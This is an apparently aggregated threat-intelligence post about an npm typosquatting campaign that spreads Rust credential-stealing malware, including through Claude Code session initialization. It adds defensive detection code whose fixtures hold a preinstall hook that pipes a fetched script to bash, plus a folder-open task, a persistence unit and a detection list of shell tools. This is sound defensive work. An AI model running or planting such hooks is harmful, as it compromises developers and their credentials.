Anonymous Intelligence Signal

Sukob Threat Actor Deploys Rust Malware via npm Typosquatting to Hijack Developer Credentials and CI/CD Pipelines

human | The Lab | unverified | 2026-05-14 13:18:31 | Source: Mastodon:mastodon.social:#cybersecurity

A sophisticated npm supply chain attack has surfaced that uses typosquatting to distribute a Rust-based malware payload built to harvest developer credentials and establish persistent footholds across software ecosystems. The campaign, attributed to the Sukob threat actor, relies on a malicious package named 'crypto-javascri', a look-alike of the widely used 'crypto-js' library, so that a developer who mistypes the intended package name during installation pulls in the malicious package instead, with the compromise beginning at install time rather than when the code is first imported.
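The name in this report is not a one-character typo of 'crypto-js', so a plain edit-distance check against a list of popular packages would miss it; it only becomes a near-miss once the 'js' abbreviation is expanded to 'javascript'. The following is an added example, not code from the report or from any of the projects it names, that normalizes dependency names (strip scope, split on separators, expand a small abbreviation table, which is an assumption) and then applies Levenshtein distance against a popular-package list; the popular list and the sample dependency names are constructed for illustration.

```javascript
// Added example: flag dependency names that are near-misses of well-known npm packages
// after expanding common abbreviations. The abbreviation table, the POPULAR list and
// SAMPLE_DEPS are constructed for illustration and are not data from the report.

const ABBREVIATIONS = { js: "javascript", ts: "typescript", lib: "library" };

const POPULAR = ["crypto-js", "lodash", "express", "react", "axios", "node-fetch", "chalk"];

// Normalize: lowercase, drop an npm scope, split on '-', '_' and '.', expand
// abbreviations token by token, and join the tokens back together.
function normalize(name) {
  const bare = name.toLowerCase().replace(/^@[^/]+\//, "");
  return bare
    .split(/[-_.]+/)
    .filter(Boolean)
    .map((tok) => ABBREVIATIONS[tok] || tok)
    .join("");
}

// Standard Levenshtein edit distance using a single rolling row.
function editDistance(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0]; // d[i-1][j-1] for the current j
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j]; // d[i-1][j]
      prev[j] = Math.min(
        prev[j] + 1,                                   // deletion
        prev[j - 1] + 1,                               // insertion
        diag + (a[i - 1] === b[j - 1] ? 0 : 1),        // substitution / match
      );
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Return every dependency that is not itself a popular package but whose normalized
// form is within `maxDistance` edits of a popular package's normalized form.
function typosquatCandidates(deps, popular = POPULAR, maxDistance = 2) {
  const known = new Set(popular);
  const findings = [];
  for (const dep of deps) {
    if (known.has(dep)) continue; // exact match to a popular package is fine
    const normDep = normalize(dep);
    for (const target of popular) {
      const distance = editDistance(normDep, normalize(target));
      if (distance <= maxDistance) findings.push({ dep, lookalike: target, distance });
    }
  }
  return findings;
}

// Constructed sample dependency list (not from any real project).
const SAMPLE_DEPS = ["crypto-javascri", "crypto-js", "lodahs", "express", "left-pad", "axois"];

for (const f of typosquatCandidates(SAMPLE_DEPS)) {
  console.log(`${f.dep} resembles ${f.lookalike} (distance ${f.distance})`);
}
```

Run against a real project's `package.json` dependency keys, and treat hits as review prompts rather than verdicts: legitimate packages with names close to popular ones exist, so maintain an allow-list of names you have already vetted.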

The infection chain uses several delivery vectors, including npm preinstall hooks, VS Code task configurations, and Claude Code session initialization, to launch a Rust binary that reaches its command-and-control infrastructure through Arti, the Rust implementation of the Tor client. Because the C2 traffic is onion-routed, defenders never see the real C2 endpoint in network telemetry, which makes network-based detection and blocking substantially harder. Once running, the malware harvests npm and GitHub credentials, checks that the stolen tokens are still valid, and uses them to republish trojanized versions of every package under the compromised developer's namespace, turning the attack into a self-propagating worm that spreads through trusted package ecosystems.

The campaign raises critical concerns for organizations that rely on npm-based development workflows and automated CI/CD pipelines. Security researchers warn that the malware contains cloud-aware conditional gates, environment checks that change its behavior depending on the kind of host it finds itself on, while systemd persistence keeps the implant running across reboots, so removing the malicious package alone does not evict it. The combination of typosquatting, credential theft, and worm-like propagation through legitimate package publication channels signals escalating complexity in attacks on the software development supply chain. Since this signal is marked unverified, the package name and other specifics should be confirmed against the registry before indicators are acted on.
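The report names three host-side artifacts worth checking on a workstation or CI runner that may have installed the package: npm lifecycle scripts, VS Code tasks that run on folder open, and systemd user units. The following is an added example, not code from the report or from any project it describes, that triages each of those artifact types from parsed content. The suspicious-token list is an assumption (a generic heuristic, not an indicator list from this campaign), all fixtures are constructed, and the Claude Code vector is omitted because the report gives no artifact path for it.

```javascript
// Added example: triage helpers for the three persistence/delivery artifacts named in the
// report. SUSPICIOUS is a generic heuristic (an assumption, not campaign IOCs); every
// FIXTURE_* value is constructed and uses the reserved example.invalid domain.

const SUSPICIOUS = [
  /\bcurl\b/, /\bwget\b/, /\bnode\s+-e\b/, /\bbase64\b/, /\bchmod\s+\+x\b/,
  /\/tmp\//, /\.cache\//, /\beval\b/, /\bbash\s+-c\b/,
];

function suspiciousTokens(cmd) {
  return SUSPICIOUS.filter((re) => re.test(cmd)).map((re) => re.source);
}

// 1. npm lifecycle hooks. preinstall/install/postinstall run for every installed
//    dependency; prepare runs for the root project and for git dependencies.
const LIFECYCLE = ["preinstall", "install", "postinstall", "prepare"];
function auditPackageJson(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE
    .filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => ({
      where: `package.json:${pkg.name || "?"}:${hook}`,
      cmd: scripts[hook],
      hits: suspiciousTokens(scripts[hook]),
    }));
}

// 2. VS Code tasks. A task with runOptions.runOn === "folderOpen" executes when the
//    folder is opened (subject to the editor's workspace-trust prompt).
function auditVsCodeTasks(tasksJson) {
  const tasks = (tasksJson && tasksJson.tasks) || [];
  return tasks
    .filter((t) => t.runOptions && t.runOptions.runOn === "folderOpen")
    .map((t) => {
      const cmd = [t.command, ...(t.args || [])].filter(Boolean).join(" ");
      return { where: `tasks.json:${t.label || "?"}`, cmd, hits: suspiciousTokens(cmd) };
    });
}

// 3. systemd user units (~/.config/systemd/user/*.service). Minimal INI parse; report
//    ExecStart. WantedBy is only a hint: an enabled unit also has a symlink in *.wants/.
function parseUnit(text) {
  const unit = {};
  let section = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith("#") || line.startsWith(";")) continue;
    const sec = line.match(/^\[(.+)\]$/);
    if (sec) { section = sec[1]; unit[section] = unit[section] || {}; continue; }
    const eq = line.indexOf("=");
    if (eq > 0 && section) unit[section][line.slice(0, eq).trim()] = line.slice(eq + 1).trim();
  }
  return unit;
}

function auditSystemdUnit(name, text) {
  const unit = parseUnit(text);
  const exec = (unit.Service && unit.Service.ExecStart) || "";
  const wantedBy = (unit.Install && unit.Install.WantedBy) || "";
  const autostart = /default\.target|multi-user\.target/.test(wantedBy);
  return [{ where: `systemd:${name}`, cmd: exec, hits: suspiciousTokens(exec), autostart }];
}

// Constructed fixtures standing in for files read from a suspect host.
const FIXTURE_PKG = {
  name: "crypto-javascri", version: "1.0.0",
  scripts: {
    preinstall: "node -e \"require('child_process').execSync('curl -s https://example.invalid/x | bash')\"",
    test: "echo ok",
  },
};
const FIXTURE_TASKS = { version: "2.0.0", tasks: [
  { label: "build", type: "shell", command: "npm run build" },
  { label: "warmup", type: "shell", command: "bash", args: ["-c", "~/.cache/.x/update"],
    runOptions: { runOn: "folderOpen" } },
] };
const FIXTURE_UNIT = [
  "[Unit]", "Description=Update helper",
  "[Service]", "ExecStart=/home/dev/.cache/.x/update --quiet", "Restart=always",
  "[Install]", "WantedBy=default.target",
].join("\n");

function triageAll() {
  return [
    ...auditPackageJson(FIXTURE_PKG),
    ...auditVsCodeTasks(FIXTURE_TASKS),
    ...auditSystemdUnit("update.service", FIXTURE_UNIT),
  ];
}

for (const f of triageAll()) console.log(f.where, f.hits.length ? "SUSPICIOUS" : "review", f.cmd);
```

On a real host, feed `auditPackageJson` every `node_modules/**/package.json`, `auditVsCodeTasks` the parsed `.vscode/tasks.json`, and `auditSystemdUnit` each file under `~/.config/systemd/user/`. As a preventive control, npm's `ignore-scripts` setting (`npm config set ignore-scripts true`, or `npm install --ignore-scripts`) stops lifecycle hooks such as preinstall from running at all, which removes the first delivery vector this report describes.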